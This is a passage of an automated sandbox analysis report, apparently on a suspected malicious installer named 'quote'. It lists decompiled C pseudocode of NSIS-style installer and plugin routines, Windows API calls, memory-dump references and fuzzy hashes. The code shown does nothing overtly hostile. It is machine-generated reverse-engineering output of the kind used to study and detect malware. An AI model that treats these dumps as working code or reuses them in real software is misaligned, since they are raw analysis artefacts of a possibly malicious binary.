                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                      • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                      • String ID: Tahoma
                                                                                      • API String ID: 3808545654-3580928618
                                                                                      • Opcode ID: f7d2c4ede39cd1ebf9a9ca480a1e70309c94da774c50f234bb5eb93d3cfe4977
                                                                                      • Instruction ID: 39ccdc2dc8d2035913c0323839c6798354fd507b9908b2fcb43e3dcb67b0f82d
                                                                                      • Opcode Fuzzy Hash: f7d2c4ede39cd1ebf9a9ca480a1e70309c94da774c50f234bb5eb93d3cfe4977
                                                                                      • Instruction Fuzzy Hash: C6019271904240EFE7005BB0EE4AB9A3FB4BB15300F208A3AF141B75E2C6B904458BED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E6F49161D(char _a4, short* _a8) {
                                                                                      				_Unknown_base(*)()* _t7;
                                                                                      				void* _t10;
                                                                                      				int _t14;
                                                                                      
                                                                                      				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                                      				_t10 = GlobalAlloc(0x40, _t14);
                                                                                      				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                                                      				_t3 =  &_a4; // 0x6f492238
                                                                                      				_t7 = GetProcAddress( *_t3, _t10);
                                                                                      				GlobalFree(_t10);
                                                                                      				return _t7;
                                                                                      			}






                                                                                      0x6f491637
                                                                                      0x6f491643
                                                                                      0x6f491650
                                                                                      0x6f491653
                                                                                      0x6f491657
                                                                                      0x6f491660
                                                                                      0x6f49166c

                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F492238,?,00000808), ref: 6F491635
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F492238,?,00000808), ref: 6F49163C
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F492238,?,00000808), ref: 6F491650
                                                                                      • GetProcAddress.KERNEL32(8"Io,00000000), ref: 6F491657
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F491660
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1343531538.000000006F491000.00000020.00000001.01000000.00000006.sdmp, Offset: 6F490000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1343473966.000000006F490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1343609504.000000006F494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1343646469.000000006F496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6f490000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                      • String ID: 8"Io
                                                                                      • API String ID: 1148316912-3550745945
                                                                                      • Opcode ID: ad48b375202c655d87c331678bb88ebeed9eba2473f01ade3ea9d0f5c0716742
                                                                                      • Instruction ID: 52382db15611dad9a3a8350947d358228b024ceefb5b32e97ced9ca07ac63250
                                                                                      • Opcode Fuzzy Hash: ad48b375202c655d87c331678bb88ebeed9eba2473f01ade3ea9d0f5c0716742
                                                                                      • Instruction Fuzzy Hash: 93F01C722065387BDA206AA6CC4CCABBF9CEF9B2F5B114211F628925A086624C11D7F1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00402F2B(struct HWND__* _a4, intOrPtr _a8) {
                                                                                      				short _v132;
                                                                                      				int _t11;
                                                                                      				int _t20;
                                                                                      
                                                                                      				if(_a8 == 0x110) {
                                                                                      					SetTimer(_a4, 1, 0xfa, 0);
                                                                                      					_a8 = 0x113;
                                                                                      				}
                                                                                      				if(_a8 == 0x113) {
                                                                                      					_t20 =  *0x41ea18; // 0x2c3b6
                                                                                      					_t11 =  *0x42aa24; // 0x2cb38
                                                                                      					if(_t20 >= _t11) {
                                                                                      						_t20 = _t11;
                                                                                      					}
                                                                                      					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                                      					SetWindowTextW(_a4,  &_v132);
                                                                                      					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                                      				}
                                                                                      				return 0;
                                                                                      			}






                                                                                      0x00402f3b
                                                                                      0x00402f49
                                                                                      0x00402f4f
                                                                                      0x00402f4f
                                                                                      0x00402f5d
                                                                                      0x00402f5f
                                                                                      0x00402f65
                                                                                      0x00402f6c
                                                                                      0x00402f6e
                                                                                      0x00402f6e
                                                                                      0x00402f84
                                                                                      0x00402f94
                                                                                      0x00402fa6
                                                                                      0x00402fa6
                                                                                      0x00402fae

                                                                                      APIs
                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                                                                      • MulDiv.KERNEL32(0002C3B6,00000064,0002CB38), ref: 00402F74
                                                                                      • wsprintfW.USER32 ref: 00402F84
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402F94
                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                                                                      Strings
                                                                                      • verifying installer: %d%%, xrefs: 00402F7E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: verifying installer: %d%%
                                                                                      • API String ID: 1451636040-82062127
                                                                                      • Opcode ID: 5b1bc627dd36a5102c32c12b14091c8dec43231046f13c1edcd0296a8f8e997f
                                                                                      • Instruction ID: 5483d255828af9cef8fcdd630f22e0c0956a10275527037d70a62c30cec8c61f
                                                                                      • Opcode Fuzzy Hash: 5b1bc627dd36a5102c32c12b14091c8dec43231046f13c1edcd0296a8f8e997f
                                                                                      • Instruction Fuzzy Hash: 29014471640209BBEF209F60DE49FEA3B79FB04344F008039FA06A51D0DBB995559F58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 75%
                                                                                      			E6F4925B5() {
                                                                                      				intOrPtr _t24;
                                                                                      				void* _t26;
                                                                                      				intOrPtr _t27;
                                                                                      				signed int _t39;
                                                                                      				void* _t40;
                                                                                      				void* _t43;
                                                                                      				intOrPtr _t44;
                                                                                      				void* _t45;
                                                                                      
                                                                                      				_t40 = E6F49121B();
                                                                                      				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                                                      				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                                                      				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                                                      				do {
                                                                                      					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                                                      					}
                                                                                      					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                                                      					if(_t39 <= 7) {
                                                                                      						switch( *((intOrPtr*)(_t39 * 4 +  &M6F4926E4))) {
                                                                                      							case 0:
                                                                                      								 *_t40 = 0;
                                                                                      								goto L17;
                                                                                      							case 1:
                                                                                      								__eax =  *__eax;
                                                                                      								if(__ecx > __ebx) {
                                                                                      									 *(__esp + 0x10) = __ecx;
                                                                                      									__ecx =  *(0x6f49407c + __edx * 4);
                                                                                      									__edx =  *(__esp + 0x10);
                                                                                      									__ecx = __ecx * __edx;
                                                                                      									asm("sbb edx, edx");
                                                                                      									__edx = __edx & __ecx;
                                                                                      									__eax = __eax &  *(0x6f49409c + __edx * 4);
                                                                                      								}
                                                                                      								_push(__eax);
                                                                                      								goto L15;
                                                                                      							case 2:
                                                                                      								__eax = E6F491470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                                      								goto L16;
                                                                                      							case 3:
                                                                                      								__ecx =  *0x6f49506c;
                                                                                      								__edx = __ecx - 1;
                                                                                      								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                                                      								__eax =  *0x6f49506c;
                                                                                      								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                                                      								goto L17;
                                                                                      							case 4:
                                                                                      								__eax = lstrcpynW(__edi,  *__eax,  *0x6f49506c);
                                                                                      								goto L17;
                                                                                      							case 5:
                                                                                      								_push( *0x6f49506c);
                                                                                      								_push(__edi);
                                                                                      								_push( *__eax);
                                                                                      								__imp__StringFromGUID2();
                                                                                      								goto L17;
                                                                                      							case 6:
                                                                                      								_push( *__esi);
                                                                                      								L15:
                                                                                      								__eax = wsprintfW(__edi, 0x6f495000);
                                                                                      								L16:
                                                                                      								__esp = __esp + 0xc;
                                                                                      								goto L17;
                                                                                      						}
                                                                                      					}
                                                                                      					L17:
                                                                                      					_t26 =  *(_t43 + 0x14);
                                                                                      					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                                                      						GlobalFree(_t26);
                                                                                      					}
                                                                                      					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                                                      					if(_t27 != 0) {
                                                                                      						if(_t27 != 0xffffffff) {
                                                                                      							if(_t27 > 0) {
                                                                                      								E6F4912E1(_t27 - 1, _t40);
                                                                                      								goto L26;
                                                                                      							}
                                                                                      						} else {
                                                                                      							E6F491272(_t40);
                                                                                      							L26:
                                                                                      						}
                                                                                      					}
                                                                                      					_t44 = _t44 - 1;
                                                                                      					_t43 = _t43 - 0x20;
                                                                                      				} while (_t44 >= 0);
                                                                                      				return GlobalFree(_t40);
                                                                                      			}











                                                                                      0x6f4925bf
                                                                                      0x6f4925c1
                                                                                      0x6f4925c5
                                                                                      0x6f4925d4
                                                                                      0x6f4925d8
                                                                                      0x6f4925dd
                                                                                      0x6f4925dd
                                                                                      0x6f4925e5
                                                                                      0x6f4925ec
                                                                                      0x6f4925f2
                                                                                      0x00000000
                                                                                      0x6f4925f9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492601
                                                                                      0x6f492605
                                                                                      0x6f492608
                                                                                      0x6f49260c
                                                                                      0x6f492613
                                                                                      0x6f492617
                                                                                      0x6f49261d
                                                                                      0x6f49261f
                                                                                      0x6f492621
                                                                                      0x6f492621
                                                                                      0x6f492628
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492631
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492638
                                                                                      0x6f49263e
                                                                                      0x6f492648
                                                                                      0x6f49264e
                                                                                      0x6f492653
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492674
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f49265a
                                                                                      0x6f492660
                                                                                      0x6f492661
                                                                                      0x6f492663
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f49267c
                                                                                      0x6f49267e
                                                                                      0x6f492684
                                                                                      0x6f49268a
                                                                                      0x6f49268a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f4925f2
                                                                                      0x6f49268d
                                                                                      0x6f49268d
                                                                                      0x6f492692
                                                                                      0x6f4926a3
                                                                                      0x6f4926a3
                                                                                      0x6f4926a9
                                                                                      0x6f4926ae
                                                                                      0x6f4926b3
                                                                                      0x6f4926bf
                                                                                      0x6f4926c4
                                                                                      0x00000000
                                                                                      0x6f4926c9
                                                                                      0x6f4926b5
                                                                                      0x6f4926b6
                                                                                      0x6f4926ca
                                                                                      0x6f4926ca
                                                                                      0x6f4926b3
                                                                                      0x6f4926cb
                                                                                      0x6f4926cc
                                                                                      0x6f4926cf
                                                                                      0x6f4926e3

                                                                                      APIs
                                                                                        • Part of subcall function 6F49121B: GlobalAlloc.KERNEL32(00000040,?,6F49123B,?,6F4912DF,00000019,6F4911BE,-000000A0), ref: 6F491225
                                                                                      • GlobalFree.KERNEL32(?), ref: 6F4926A3
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F4926D8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1343531538.000000006F491000.00000020.00000001.01000000.00000006.sdmp, Offset: 6F490000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1343473966.000000006F490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1343609504.000000006F494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1343646469.000000006F496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6f490000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: fb124dac3ff8d247c915d1a640a7a34e2180f64e62847d954eda4e4c992b0e89
                                                                                      • Instruction ID: 746957ba35054d2af5e009889d9cf8b817aa11432f672ffa7caadee11c0256a6
                                                                                      • Opcode Fuzzy Hash: fb124dac3ff8d247c915d1a640a7a34e2180f64e62847d954eda4e4c992b0e89
                                                                                      • Instruction Fuzzy Hash: 9931AE31304501EFDB14EF68C994C2A7FBAFB96315310822DE12097F60CB32AE25CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 86%
                                                                                      			E00402947(int __ebx, void* __eflags) {
                                                                                      				void* _t26;
                                                                                      				long _t31;
                                                                                      				int _t45;
                                                                                      				void* _t49;
                                                                                      				void* _t51;
                                                                                      				void* _t54;
                                                                                      				void* _t55;
                                                                                      				void* _t56;
                                                                                      
                                                                                      				_t45 = __ebx;
                                                                                      				 *((intOrPtr*)(_t56 - 0x38)) = 0xfffffd66;
                                                                                      				_t50 = E00402D3E(0xfffffff0);
                                                                                      				 *(_t56 - 0x40) = _t23;
                                                                                      				if(E00405D5D(_t50) == 0) {
                                                                                      					E00402D3E(0xffffffed);
                                                                                      				}
                                                                                      				E00405EE2(_t50);
                                                                                      				_t26 = E00405F07(_t50, 0x40000000, 2);
                                                                                      				 *(_t56 + 8) = _t26;
                                                                                      				if(_t26 != 0xffffffff) {
                                                                                      					_t31 =  *0x434f18;
                                                                                      					 *(_t56 - 0x44) = _t31;
                                                                                      					_t49 = GlobalAlloc(0x40, _t31);
                                                                                      					if(_t49 != _t45) {
                                                                                      						E0040347D(_t45);
                                                                                      						E00403467(_t49,  *(_t56 - 0x44));
                                                                                      						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x28));
                                                                                      						 *(_t56 - 0x10) = _t54;
                                                                                      						if(_t54 != _t45) {
                                                                                      							E0040324C( *((intOrPtr*)(_t56 - 0x2c)), _t45, _t54,  *(_t56 - 0x28));
                                                                                      							while( *_t54 != _t45) {
                                                                                      								_t47 =  *_t54;
                                                                                      								_t55 = _t54 + 8;
                                                                                      								 *(_t56 - 0x3c) =  *_t54;
                                                                                      								E00405EC2( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                                                      								_t54 = _t55 +  *(_t56 - 0x3c);
                                                                                      							}
                                                                                      							GlobalFree( *(_t56 - 0x10));
                                                                                      						}
                                                                                      						E00405FB9( *(_t56 + 8), _t49,  *(_t56 - 0x44));
                                                                                      						GlobalFree(_t49);
                                                                                      						 *((intOrPtr*)(_t56 - 0x38)) = E0040324C(0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                                                      					}
                                                                                      					CloseHandle( *(_t56 + 8));
                                                                                      				}
                                                                                      				_t51 = 0xfffffff3;
                                                                                      				if( *((intOrPtr*)(_t56 - 0x38)) < _t45) {
                                                                                      					_t51 = 0xffffffef;
                                                                                      					DeleteFileW( *(_t56 - 0x40));
                                                                                      					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                                                      				}
                                                                                      				_push(_t51);
                                                                                      				E00401423();
                                                                                      				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t56 - 4));
                                                                                      				return 0;
                                                                                      			}











                                                                                      0x00402947
                                                                                      0x00402949
                                                                                      0x00402955
                                                                                      0x00402958
                                                                                      0x00402962
                                                                                      0x00402966
                                                                                      0x00402966
                                                                                      0x0040296c
                                                                                      0x00402979
                                                                                      0x00402981
                                                                                      0x00402984
                                                                                      0x0040298a
                                                                                      0x00402998
                                                                                      0x0040299d
                                                                                      0x004029a1
                                                                                      0x004029a4
                                                                                      0x004029ad
                                                                                      0x004029b9
                                                                                      0x004029bd
                                                                                      0x004029c0
                                                                                      0x004029ca
                                                                                      0x004029e9
                                                                                      0x004029d1
                                                                                      0x004029d6
                                                                                      0x004029de
                                                                                      0x004029e1
                                                                                      0x004029e6
                                                                                      0x004029e6
                                                                                      0x004029f0
                                                                                      0x004029f0
                                                                                      0x004029fd
                                                                                      0x00402a03
                                                                                      0x00402a15
                                                                                      0x00402a15
                                                                                      0x00402a1b
                                                                                      0x00402a1b
                                                                                      0x00402a26
                                                                                      0x00402a27
                                                                                      0x00402a2b
                                                                                      0x00402a2f
                                                                                      0x00402a35
                                                                                      0x00402a35
                                                                                      0x00402a3c
                                                                                      0x004022e9
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                                                                      • GlobalFree.KERNEL32(?), ref: 004029F0
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2667972263-0
                                                                                      • Opcode ID: a5ba4848feea4339aca0bd9ed9ef3b7077546e738993ad0ee054be50b6b812c9
                                                                                      • Instruction ID: 6d3b5365c2144e4253305efdfeae8c7c86b7c4bf3cccdf3f9a106f7510f1e1f6
                                                                                      • Opcode Fuzzy Hash: a5ba4848feea4339aca0bd9ed9ef3b7077546e738993ad0ee054be50b6b812c9
                                                                                      • Instruction Fuzzy Hash: 6121BD71800124BBCF216FA9DE49D9F7E79EF05364F10023AF560762E1CB784D419BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 85%
                                                                                      			E6F4923E0(void* __edx) {
                                                                                      				void* _t37;
                                                                                      				signed int _t38;
                                                                                      				void* _t39;
                                                                                      				void* _t41;
                                                                                      				signed char* _t42;
                                                                                      				signed char* _t51;
                                                                                      				void* _t52;
                                                                                      				void* _t54;
                                                                                      
                                                                                      				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                                                      				while(1) {
                                                                                      					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                                                      					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                                                      					_t52 = _t51[0x18];
                                                                                      					if(_t52 == 0) {
                                                                                      						goto L9;
                                                                                      					}
                                                                                      					_t41 = 0x1a;
                                                                                      					if(_t52 == _t41) {
                                                                                      						goto L9;
                                                                                      					}
                                                                                      					if(_t52 != 0xffffffff) {
                                                                                      						if(_t52 <= 0 || _t52 > 0x19) {
                                                                                      							_t51[0x18] = _t41;
                                                                                      							goto L12;
                                                                                      						} else {
                                                                                      							_t37 = E6F4912BA(_t52 - 1);
                                                                                      							L10:
                                                                                      							goto L11;
                                                                                      						}
                                                                                      					} else {
                                                                                      						_t37 = E6F491243();
                                                                                      						L11:
                                                                                      						_t52 = _t37;
                                                                                      						L12:
                                                                                      						_t13 =  &(_t51[8]); // 0x1020
                                                                                      						_t42 = _t13;
                                                                                      						if(_t51[4] >= 0) {
                                                                                      						}
                                                                                      						_t38 =  *_t51 & 0x000000ff;
                                                                                      						_t51[0x1c] = 0;
                                                                                      						if(_t38 > 7) {
                                                                                      							L27:
                                                                                      							_t39 = GlobalFree(_t52);
                                                                                      							if( *(_t54 + 0x10) == 0) {
                                                                                      								return _t39;
                                                                                      							}
                                                                                      							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                                                      								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                                                      							} else {
                                                                                      								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                                                      							}
                                                                                      							continue;
                                                                                      						} else {
                                                                                      							switch( *((intOrPtr*)(_t38 * 4 +  &M6F492558))) {
                                                                                      								case 0:
                                                                                      									 *_t42 = 0;
                                                                                      									goto L27;
                                                                                      								case 1:
                                                                                      									__eax = E6F491311(__ebp);
                                                                                      									goto L21;
                                                                                      								case 2:
                                                                                      									 *__edi = E6F491311(__ebp);
                                                                                      									__edi[1] = __edx;
                                                                                      									goto L27;
                                                                                      								case 3:
                                                                                      									__eax = GlobalAlloc(0x40,  *0x6f49506c);
                                                                                      									 *(__esi + 0x1c) = __eax;
                                                                                      									__edx = 0;
                                                                                      									 *__edi = __eax;
                                                                                      									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x6f49506c, __eax,  *0x6f49506c, 0, 0);
                                                                                      									goto L27;
                                                                                      								case 4:
                                                                                      									__eax = E6F49122C(__ebp);
                                                                                      									 *(__esi + 0x1c) = __eax;
                                                                                      									L21:
                                                                                      									 *__edi = __eax;
                                                                                      									goto L27;
                                                                                      								case 5:
                                                                                      									__eax = GlobalAlloc(0x40, 0x10);
                                                                                      									_push(__eax);
                                                                                      									 *(__esi + 0x1c) = __eax;
                                                                                      									_push(__ebp);
                                                                                      									 *__edi = __eax;
                                                                                      									__imp__CLSIDFromString();
                                                                                      									goto L27;
                                                                                      								case 6:
                                                                                      									if( *__ebp != __cx) {
                                                                                      										__eax = E6F491311(__ebp);
                                                                                      										 *__ebx = __eax;
                                                                                      									}
                                                                                      									goto L27;
                                                                                      								case 7:
                                                                                      									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                                                      									( *(__esi + 0x18) - 1) *  *0x6f49506c =  *0x6f495074 + ( *(__esi + 0x18) - 1) *  *0x6f49506c * 2 + 0x18;
                                                                                      									 *__ebx =  *0x6f495074 + ( *(__esi + 0x18) - 1) *  *0x6f49506c * 2 + 0x18;
                                                                                      									asm("cdq");
                                                                                      									__eax = E6F491470(__edx,  *0x6f495074 + ( *(__esi + 0x18) - 1) *  *0x6f49506c * 2 + 0x18, __edx,  *0x6f495074 + ( *(__esi + 0x18) - 1) *  *0x6f49506c * 2);
                                                                                      									goto L27;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					L9:
                                                                                      					_t37 = E6F49122C(0x6f495044);
                                                                                      					goto L10;
                                                                                      				}
                                                                                      			}











                                                                                      0x6f4923f4
                                                                                      0x6f4923f8
                                                                                      0x6f492403
                                                                                      0x6f492403
                                                                                      0x6f49240a
                                                                                      0x6f49240f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492413
                                                                                      0x6f492416
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f49241b
                                                                                      0x6f492426
                                                                                      0x6f492436
                                                                                      0x00000000
                                                                                      0x6f49242d
                                                                                      0x6f49242f
                                                                                      0x6f492445
                                                                                      0x00000000
                                                                                      0x6f492445
                                                                                      0x6f49241d
                                                                                      0x6f49241d
                                                                                      0x6f492446
                                                                                      0x6f492446
                                                                                      0x6f492448
                                                                                      0x6f49244c
                                                                                      0x6f49244c
                                                                                      0x6f49244f
                                                                                      0x6f49244f
                                                                                      0x6f492457
                                                                                      0x6f49245f
                                                                                      0x6f492462
                                                                                      0x6f492521
                                                                                      0x6f492522
                                                                                      0x6f49252d
                                                                                      0x6f492557
                                                                                      0x6f492557
                                                                                      0x6f49253d
                                                                                      0x6f492549
                                                                                      0x6f49253f
                                                                                      0x6f49253f
                                                                                      0x6f49253f
                                                                                      0x00000000
                                                                                      0x6f492468
                                                                                      0x6f492468
                                                                                      0x00000000
                                                                                      0x6f49246f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492477
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492485
                                                                                      0x6f492487
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f4924a8
                                                                                      0x6f4924ae
                                                                                      0x6f4924b1
                                                                                      0x6f4924b3
                                                                                      0x6f4924c3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492490
                                                                                      0x6f492495
                                                                                      0x6f492498
                                                                                      0x6f492499
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f4924cf
                                                                                      0x6f4924d5
                                                                                      0x6f4924d6
                                                                                      0x6f4924d9
                                                                                      0x6f4924da
                                                                                      0x6f4924dc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f4924e8
                                                                                      0x6f4924eb
                                                                                      0x6f4924f7
                                                                                      0x6f4924f9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492505
                                                                                      0x6f492511
                                                                                      0x6f492514
                                                                                      0x6f492516
                                                                                      0x6f492519
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492468
                                                                                      0x6f492462
                                                                                      0x6f49243b
                                                                                      0x6f492440
                                                                                      0x00000000
                                                                                      0x6f492440

                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F492522
